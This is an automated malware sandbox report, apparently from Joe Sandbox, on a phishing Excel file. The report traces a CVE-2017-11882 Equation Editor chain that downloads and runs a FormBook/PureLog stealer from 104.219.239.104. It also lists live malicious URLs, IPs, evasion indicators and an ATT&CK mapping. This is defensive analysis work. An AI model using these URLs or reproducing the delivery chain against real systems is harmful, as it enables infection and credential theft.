              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: _0020.SetAccessControl
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, hNFj00Hv45CTOkfqEI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: _0020.SetAccessControl
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: _0020.SetAccessControl
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@7/25@6/3
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\07330000
              Source: C:\Users\user\AppData\Roaming\winiti.exeMutant created: NULL
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR77FC.tmp
              Source: RFQ#51281AOLAI.xlsOLE indicator, Workbook stream: true
              Source: 07330000.0.drOLE indicator, Workbook stream: true
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hosts
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dll
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: bcrypt.dll
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: rpcrtremote.dll
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: RFQ#51281AOLAI.xlsStatic file information: File size 1155083 > 1048576
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: amWV.pdb source: winiti.exe, 00000008.00000000.412497282.0000000001382000.00000020.00000001.01000000.00000005.sdmp, winiti[1].exe.7.dr, winiti.exe.7.dr
              Source: Binary string: amWV.pdbSHA256 source: winiti.exe, 00000008.00000000.412497282.0000000001382000.00000020.00000001.01000000.00000005.sdmp, winiti[1].exe.7.dr, winiti.exe.7.dr
              Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
              Source: 07330000.0.drInitial sample: OLE indicators vbamacros = False
              Source: RFQ#51281AOLAI.xlsInitial sample: OLE indicators encrypted = True

              Data Obfuscation

              Source: 8.2.winiti.exe.590000.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 8.2.winiti.exe.289505c.4.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: winiti[1].exe.7.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
              Source: winiti.exe.7.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
              Source: 8.2.winiti.exe.3bf0ff8.6.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00401420 push es; retn 00F1h9_2_004014F8
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041F0DC push es; retf 9_2_0041F0E6
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00412104 pushad ; ret 9_2_0041212D
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040C1EA push edx; retf 9_2_0040C1EE
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00403260 push eax; ret 9_2_00403262
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00426263 push edi; iretd 9_2_0042626E
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00408271 push es; ret 9_2_00408272
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00413A0B push esi; retf 9_2_00413A0E
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00418A13 push ds; retf 2ECDh9_2_00418BEE
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00418355 push ebp; retf 9_2_004183DC
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00418BA5 push ebx; iretd 9_2_00418BA6
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041E653 push ds; iretd 9_2_0041E654
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041E63B push ebx; iretd 9_2_0041E64C
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004187CA push ebp; ret 9_2_004187CB
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008EDFA1 push ecx; ret 9_2_008EDFB4
              Source: winiti[1].exe.7.drStatic PE information: section name: .text entropy: 7.760978166314589
              Source: winiti.exe.7.drStatic PE information: section name: .text entropy: 7.760978166314589

              Persistence and Installation Behavior

              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\tny.wtf\DavWWWRootJump to behavior
              Source: Office documentLLM: Score: 9 Reasons: The screenshot contains a visually prominent image that appears to be a button or link, with the text 'This document is protected' under a Microsoft Office logo. This can mislead users into thinking they need to click to view the document. The text creates a sense of urgency or necessity to access the document, which is a common tactic in phishing attacks. The use of the Microsoft Office logo impersonates a well-known brand, adding to the credibility of the phishing attempt. The sense of urgency is directly connected to the prominent button-like image, increasing the likelihood of a user clicking on it.
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc.0.drJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: FFE27256.doc.3.drJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: RFQ#51281AOLAI.xlsStream path 'MBD001BDE15/Package' entropy: 7.97230907292 (max. 8.0)
              Source: RFQ#51281AOLAI.xlsStream path 'Workbook' entropy: 7.99941847659 (max. 8.0)
              Source: 07330000.0.drStream path 'MBD001BDE15/Package' entropy: 7.96745742421 (max. 8.0)
              Source: 07330000.0.drStream path 'Workbook' entropy: 7.99939043223 (max. 8.0)
              Source: ~DF6D5A74146301A5A1.TMP.0.drStream path 'Package' entropy: 7.96745742421 (max. 8.0)
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 2C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 2870000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 3C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 58C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 5360000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 68C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 78C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00930101 rdtsc 9_2_00930101
              Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2912Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3124Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3148Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00417A03 LdrLoadDll,9_2_00417A03
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008D0080 mov ecx, dword ptr fs:[00000030h]9_2_008D0080
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008D00EA mov eax, dword ptr fs:[00000030h]9_2_008D00EA
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008F26F8 mov eax, dword ptr fs:[00000030h]9_2_008F26F8
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Users\user\AppData\Roaming\winiti.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeQueries volume information: C:\Users\user\AppData\Roaming\winiti.exe VolumeInformationJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 8.2.winiti.exe.289505c.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.winiti.exe.590000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.winiti.exe.590000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.winiti.exe.289505c.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.414747610.0000000000590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.415607695.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 8.2.winiti.exe.289505c.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.winiti.exe.590000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.winiti.exe.590000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.winiti.exe.289505c.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.414747610.0000000000590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.415607695.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid Accounts33
              Exploitation for Client Execution
              1
              Browser Extensions
              111
              Process Injection
              1
              Masquerading
              OS Credential Dumping2
              Security Software Discovery
              Remote Services11
              Archive Collected Data
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scripting
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              LSASS Memory1
              Process Discovery
              Remote Desktop ProtocolData from Removable Media14
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading
              1
              Extra Window Memory Injection
              41
              Virtualization/Sandbox Evasion
              Security Account Manager41
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
              Process Injection
              NTDS1
              Remote System Discovery
              Distributed Component Object ModelInput Capture23
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Obfuscated Files or Information
              Cached Domain Credentials13
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
              Software Packing
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Extra Window Memory Injection
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              [Behavior graph: ID 1483000, Sample: RFQ#51281AOLAI.xls, Start date: 26/07/2024, Architecture: WINDOWS, Score: 100]

              Source | Detection | Scanner | Label | Link
              RFQ#51281AOLAI.xls | 100% | Joe Sandbox ML | |

              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen |
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc | 100% | Avira | HEUR/Rtf.Malformed |
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFE27256.doc | 100% | Avira | HEUR/Rtf.Malformed |
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe | 100% | Joe Sandbox ML | |
              C:\Users\user\AppData\Roaming\winiti.exe | 100% | Joe Sandbox ML | |

              No Antivirus matches
              No Antivirus matches

              Source | Detection | Scanner | Label | Link
              http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc | 100% | Avira URL Cloud | malware |
              http://104.219.239.104/80/winiti.exelay | 0% | Avira URL Cloud | safe |
              http://104.219.239.104/80/winiti.exekkC: | 0% | Avira URL Cloud | safe |
              http://104.219.239.104/80/winiti.exeRe | 0% | Avira URL Cloud | safe |
              http://104.219.239.104/80/winiti.exej | 0% | Avira URL Cloud | safe |
              http://104.219.239.104/80/winiti.exe | 100% | Avira URL Cloud | malware |
              http://tny.wtf/ | 0% | Avira URL Cloud | safe |
              http://tny.wtf/dGayX | 0% | Avira URL Cloud | safe |
              http://tny.wtf/dGa | 0% | Avira URL Cloud | safe |

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              tny.wtf | 188.114.97.3 | true | true | | unknown

              Name | Malicious | Antivirus Detection | Reputation
              http://104.219.239.104/80/winiti.exe | true | Avira URL Cloud: malware | unknown
              http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc | true | Avira URL Cloud: malware | unknown
              http://tny.wtf/dGa | false | Avira URL Cloud: safe | unknown

              Name | Source | Malicious | Antivirus Detection | Reputation
              http://tny.wtf/ | tny.wtf.url.3.dr | false | Avira URL Cloud: safe | unknown
              http://tny.wtf/dGayX | 07330000.0.dr, ~DFA2DBDD95D657A82C.TMP.0.dr | false | Avira URL Cloud: safe | unknown
              http://104.219.239.104/80/winiti.exeRe | EQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://104.219.239.104/80/winiti.exelay | EQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://104.219.239.104/80/winiti.exekkC: | EQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://104.219.239.104/80/winiti.exej | EQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                104.219.239.104 | unknown | United States | 27176 | DATAWAGONUS | true
                188.114.97.3 | tny.wtf | European Union | 13335 | CLOUDFLARENETUS | true
                188.114.96.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1483000
                Start date and time:2024-07-26 13:39:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 35s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:11
                Number of new started drivers analysed:1
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • GSI enabled (VBA)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:RFQ#51281AOLAI.xls
                Detection:MAL
                Classification:mal100.troj.expl.evad.winXLS@7/25@6/3
                EGA Information:
                • Successful, ratio: 66.7%
                HCA Information:
                • Successful, ratio: 88%
                • Number of executed functions: 67
                • Number of non-executed functions: 60
                Cookbook Comments:
                • Found application associated with file extension: .xls
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer
                • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
                • Execution Graph export aborted for target EQNEDT32.EXE, PID 1256 because there are no executed function
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: RFQ#51281AOLAI.xls
                Time | Type | Description
                07:40:26 | API Interceptor | 62x Sleep call for process: EQNEDT32.EXE modified
                07:40:29 | API Interceptor | 11x Sleep call for process: winiti.exe modified
                InputOutput
                URL: Office document Model: gpt-4o
                ```json
                {
                  "riskscore": 9,
                  "reasons": "The screenshot contains a visually prominent image that appears to be a button or link, with the text 'This document is protected' under a Microsoft Office logo. This can mislead users into thinking they need to click to view the document. The text creates a sense of urgency or necessity to access the document, which is a common tactic in phishing attacks. The use of the Microsoft Office logo impersonates a well-known brand, adding to the credibility of the phishing attempt. The sense of urgency is directly connected to the prominent button-like image, increasing the likelihood of a user clicking on it."
                }
                ```
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                104.219.239.104RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104/80/winiti.exe
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104/80/winiti.exe
                irlsever.docGet hashmaliciousFormBookBrowse
                • 104.219.239.104/54/winiti.exe
                54.xlsGet hashmaliciousFormBookBrowse
                • 104.219.239.104/54/winiti.exe
                188.114.97.3DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/
                Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                • tny.wtf/
                AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/sA
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • tny.wtf/
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • tny.wtf/
                #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/4Gs
                Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
                • downloaddining2.com/h9fmdW6/index.php
                Quotation.exeGet hashmaliciousFormBookBrowse
                • www.bahisanaliz16.xyz/ty31/?nfuxZr=JoA2dMXfLBqFXt4x+LwNr+felGYfgJXJPNkjuKbt07zo6G2Rowrau43mkNbOTfffhSkjLsiciQ==&v6AxO=1bjHLvGh8ZYHMfZp
                LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                • www.whatareyoucraving.com/drbb/
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/pqv2p
                188.114.96.3DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/dg4Zx
                Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
